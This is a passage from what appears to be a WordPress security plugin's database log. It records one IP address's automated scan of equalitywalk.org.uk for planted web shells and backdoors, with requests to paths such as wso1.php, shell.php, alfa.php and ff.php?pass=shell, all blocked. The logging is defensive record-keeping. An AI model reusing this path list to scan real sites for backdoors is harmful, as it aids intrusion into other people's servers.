Safari\\/537.36\"}','DGZElzC9Fqnvm3cRAyUJIr7k',0,1674121220.9161,143,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ZMfF8IczkC5sLU0i9EexDalb',0,1674121221.1691,416,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','RS1Omonpk7U269jBaQrFxiJw',0,1674121224.5254,363,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/test/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ZYO5hdUymK3ngstF27S6ec1P',0,1674121224.4032,485,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','6XeFl5JUo9GSQtkhaYq3vgKr',0,1674121224.2908,602,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/fox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','SPTVINUoLM3wdpcghWRj4sfe',0,1674121224.3532,592,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp-admin/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','TPlEtpWI4MJ6XKdmgo5USRVk',0,1674121224.8360,369,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','7Cx46AUntKl3IZq1cSMfNF2E',0,1674121224.7777,711,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/0z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','URtHMAKcPnasDlWVj35uX4oq',0,1674121227.2765,107,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/ne.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','gHeQ9IwjkXKoUOA64RmDsrFB',0,1674121227.7660,100,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','cyWER9khDFTL47o2atlqvOQm',0,1674121235.1381,327,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Ru1PLK9jO2YmvV5S04MBtlkh',0,1674121235.4756,265,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','DB35HE40uKULAoRmZIys7kvz',0,1674121237.5746,102,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','xtfCNWgeTRS05IPmHrqzdF8b',0,1674121239.2992,112,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','XGH8lzhdrgyaKbSpnv4Cq50o',0,1674121244.6821,128,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/indeeex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','APDtnGKWsk8ZzySCM2b5IfeH',0,1674121248.9558,344,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp-includes/991176.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','OHgubVneX6azCfY1KirPwx3E',0,1674121249.1240,505,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','VtTbl5voEL3eGqNOZHC2FjSi',0,1674121253.6083,146,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','859sLkfQithulmnNYWJGjDHS',0,1674121256.1986,142,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','zxMyi8RDYp2NhgUnrokVWvH6',0,1674121256.8093,154,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/xindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','leuE4Dj69xv5RZbzKgHwGmUo',0,1674121257.7633,102,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/.cgi/cache/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','VJLKhBvkDGmfURtbeCW08q4T',0,1674121257.7982,132,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','p4nfqYrswET9jtBmuaDS5PLx',0,1674121259.8093,193,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp-includes/customize/class-wp-customize-nav-menu.php?new','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','0yTvmiHnBKhOd7CwVXQ5rpcM',0,1674121260.4784,131,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/ff.php?pass=shell','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','OMA4WqjPoTGlCrZ2IEmLYF7t',0,1674121260.7752,104,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','zUCqemj85BhQ67wGIysX9Zco',0,1674121262.4859,155,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','YhxvrcGzPASbaeBNlMHj56mL',0,1674121262.5168,168,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/indeeex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','4pFtc01XCHlBhTkYWzg8ndPa',0,1674121267.3072,138,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp-includes/991176.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','H49gNZnp3asAYotCPzh8evLU',0,1674121268.4225,115,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','G86EOHqN3Po4tr5dclzKeCvp',0,1674121273.4497,104,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','PrjlxITDQKMem7yALfpnSqsb',0,1674121275.4158,311,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','4wZkzNctVsG1SnaFEbH6QrXD',0,1674121276.2771,114,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','1VU6TmsaklPH7CKuoeGnFrjW',0,1674121277.1488,115,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','9AWHmK4OqpLC8EnTreNoyVjk',0,1674121277.9411,139,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','57J1WCxsjbAYgd0yZ9fnmPwz',0,1674121278.5853,260,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp-includes/customize/class-wp-customize-nav-menu.php?new','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','8VhNBEG4ioHAMtD7K3yXpT6n',0,1674121279.4777,125,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','TeZknHh7RrIq9tCQJ84usxyS',0,1674121279.4709,340,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/ff.php?pass=shell','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','JQfpn7vok8PGyYS2ZDNdiF0l',0,1674121279.9935,233,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','642ahbt9UuyewAMLOxWElzZf',0,1674121280.2150,134,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/.cgi/cache/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','3HcDTwA0925Lqu4IoXGaJQSR',0,1674121280.4032,160,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','SWevj0lmXkT5Mgu1IU3b8oZn',0,1674121281.5066,125,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','tPdlNnbjqJsGOcAHD1i8g6Zo',0,1674121287.9231,119,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','fSv48atDHqQVO07X9krRpudl',0,1674121288.4796,137,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','pRg3YObIxz8FsLq7rDHm2jGM',0,1674121289.4978,103,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','H1BIcTa3N0voOuMQgJCiP4G6',0,1674121290.3547,102,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','09jC1rlfAY3UHE7hDd6gVwPb',0,1674121290.8809,105,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ZBuEx92Mdc1PXq8emAnNSJGi',0,1674121308.2582,290,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp-includes/IXR/hunt.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ylGFepJg8hvWEP4DXCYjNRuQ',0,1674121339.9039,183,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp-includes/IXR/hunt.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','kGeac0NWO8gKlIQVXU2SjLoF',0,1674121345.4290,140,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/b.php','','{\"1\":\"python-requests\\/2.28.2\"}','MTdFiX6CBb0xZ18z5tnpJsNa',0,1674121377.4101,123,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','VxwOYzqJvK40ufjcFGC3nX8t',0,1674121379.5520,152,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/a.php','','{\"1\":\"python-requests\\/2.28.2\"}','hCSZgMkyuVe3H7fU2NLvmYWr',0,1674121414.3384,171,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/content.php','','{\"1\":\"python-requests\\/2.28.2\"}','LlqfJsHTniSjtv94wzcgEkG8',0,1674121414.3917,164,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/e.php','','{\"1\":\"python-requests\\/2.28.2\"}','ylZscpaD1mGjq4AgLFtPBYUd',0,1674121414.3909,221,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/ws.php','','{\"1\":\"python-requests\\/2.28.2\"}','ePdj0acowJSyMDqvgrp9T28x',0,1674121414.7818,194,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','uqQ1icYaXKtPLbvhenG4wTUH',0,1674121427.7217,160,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','WpawCKNyZuDEbJYtjkzL3S9Q',0,1674121427.8492,233,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp-includes/css/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','3t5kznVo1XiFeBTK7jOgc9fL',0,1674121428.1356,231,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','0bXHWKFPQ2mjdgGI4SavepZu',0,1674121428.4435,154,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/stindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Cfi7gouksUQS9PdlXvDbO8Jt',0,1674121428.6489,120,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','hU68PA3Q45M0DgVWu79yfYBJ',0,1674121429.2063,142,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','eSG9JWThDU2a3yi4fCRN0oVL',0,1674121429.2149,140,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','xvGo4yWKM7TUnmgi2lLuSNqF',0,1674121429.2219,155,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','EHj0m2zsraIpfDn4kNYoRWQy',0,1674121429.4775,100,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','EjRKkywF6LxfG74TnYPtDMUp',0,1674121429.6316,135,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','3nF8IuwGdkfoLTXU1g5KmxJN',0,1674121430.3772,139,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','HJznIZ8iLQTVXOxGNYjSqcU9',0,1674121430.5188,190,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/xmlrpcs.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','eaShiOmqXrkHN765AuY9VQdZ',0,1674121430.6735,196,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','YID9QrHPkWtTzmiwfZ57CqLE',0,1674121430.6677,376,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','5FnC0u2OPdThwm86o7RD4qrs',0,1674121431.0733,279,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Wix53OFGYDQmMvKBXp6kSfUH',0,1674121433.1105,140,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','cl2tE47bUdHwfq0DYnQgxV1F',0,1674121434.5751,171,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','YMsZ6klKqRvHa9513O4JG2ej',0,1674121435.6589,90,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','hfA6gUZ3isCHybR1kvxYJXOe',0,1674121436.5822,97,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','hWMPiBrU50TOmYnK9Qewdp7v',0,1674121437.1357,118,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','eS9B3nKFvMjhf7xpEXZ1Lco2',0,1674121437.4492,109,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','PhaWsvRVf0Hu9xCDjgFU3Ilk',0,1674121437.6373,90,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/xltavrat.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','jZOAdC2vsgKrUoIyTnhSlcRu',0,1674121438.3555,89,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/5.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Aq8mfUrsVaWB27z4DphZQ0b3',0,1674121438.6200,138,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','2AUxfqTBhbcoOJ3NGzZesKPm',0,1674121439.0417,121,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','OMvF896tcnw3eRIusNQoU7ZX',0,1674121439.1245,147,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','X9EYaRcpIyfdTzloJsqkHML2',0,1674121439.4817,137,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','AG91H3ngIPaYTu7xDRmsNfiK',0,1674121439.4819,141,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://equalitywalk.org.uk/Uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 